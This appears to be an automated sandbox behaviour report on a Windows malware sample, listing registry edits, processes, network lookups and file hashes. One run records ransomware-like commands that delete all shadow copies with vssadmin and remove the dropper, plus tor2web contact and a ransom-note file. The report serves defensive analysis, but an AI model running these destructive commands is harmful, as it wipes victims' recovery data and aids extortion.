| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c03c22115836db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4AEBD0B1-A24B-11EF-A087-5EE01BAFE073} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc50000000000200000000001066000000010000200000005c4a7c21eb06f2cba6d202bf09ba244629d4e6ee983b9be9c27149045ab48ebf000000000e8000000002000020000000d02cc8d281bfa366ffdddd89e94f3e9d6ae2148420fa5ba0b5675cc3544a646520000000289ab29cee570ba7c5d86c222a672075fe45f9aa3bbb1937a78675da9af74b3b40000000b22a69e8ff1e62f2971376c948a9a00199c66facc48a0665d4dec939338cb378487ad48d11ab697a94a367491fa2778f89586b3cce8a39ec5d68d7ecf5b16928 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
"C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe"
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Users\Admin\AppData\Roaming\vtpvaio.exe
C:\Users\Admin\AppData\Roaming\vtpvaio.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\E906FA~1.EXE >> NUL
C:\Users\Admin\AppData\Roaming\vtpvaio.exe
C:\Users\Admin\AppData\Roaming\vtpvaio.exe
C:\Windows\System32\vssadmin.exe
"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" http://3kxwjihmkgibht2s.wh47f2as19.com/?enc=1GHhpfZuUVY1VcG3nWAFyuuodC4NNprDPZ
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1880 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:209933 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:406534 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1061910 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1258514 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1258524 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1192984 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1651745 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1520690 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:1586220 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:3159095 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:204 CREDAT:3093552 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | epmhyca5ol6plmx3.wh47f2as19.com | udp |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.7hwr34n18.com | udp |
| US | 8.8.8.8:53 | epmhyca5ol6plmx3.tor2web.blutmagie.de | udp |
| US | 8.8.8.8:53 | epmhyca5ol6plmx3.tor2web.fi | udp |
| US | 8.8.8.8:53 | 3kxwjihmkgibht2s.wh47f2as19.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
\Users\Admin\AppData\Roaming\vtpvaio.exe
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\HELP_RESTORE_FILES.txt
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{4AEBD0B1-A24B-11EF-A087-5EE01BAFE073}.dat
C:\Users\Admin\AppData\Roaming\log.html
C:\Users\Admin\AppData\Local\Temp\CabD7FA.tmp
C:\Users\Admin\AppData\Local\Temp\TarD8C8.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\dnserror[1]
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\errorPageStrings[1]
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D6V88JEY\NewErrorPageTemplate[1]
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\httpErrorPagesScripts[2]
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win10ltsc2021-20241023-en
Max time kernel
100s
Max time network
111s
Command Line
Signatures
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5096 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe |
| PID 5096 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe |
| PID 5096 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
"C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe"
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\ExpandInitialize.wmf"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 172.165.69.228:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win11-20241007-en
Max time kernel
116s
Max time network
96s
Command Line
Signatures
Enumerates connected drives
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\unregmp2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
"C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe"
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/1964-0-0x0000000000400000-0x0000000000448000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 71ee2f4eb9e67942a01f9a0cebd7630a |
| SHA1 | 0fff9c44929276dbb68261ba1b7f9f07c9b37477 |
| SHA256 | b81de64dd2c12817227cf02ceb0d42dbe6beb2c2094d4784bc47db239178f217 |
| SHA512 | d3c9d1833bd659f500325b2f8820959c0d6347e4e92bf9c0e17306189eb6844ae466087d5e61ebddbe134c47ac81f4b0ff5d20322647afa2e846b7a1aee6f8b6 |
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | 0e2ab4aec194f43611ae87e9029303d5 |
| SHA1 | 58e91eb77da219d8b76f54c85d887584ea819818 |
| SHA256 | 766245d0ea8891180069ed422bc56abb4484365416da49c33f1dd8e6f3a9eba2 |
| SHA512 | 7ba99c2da5b1e12749355d96800380daa9c32784bc67d509452d55b77320bfb52c21114a3c22443219a1cca906c0e817e97f04ea063fb0b10ac6a4b447348005 |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | af6d269517872336192a7639faab8795 |
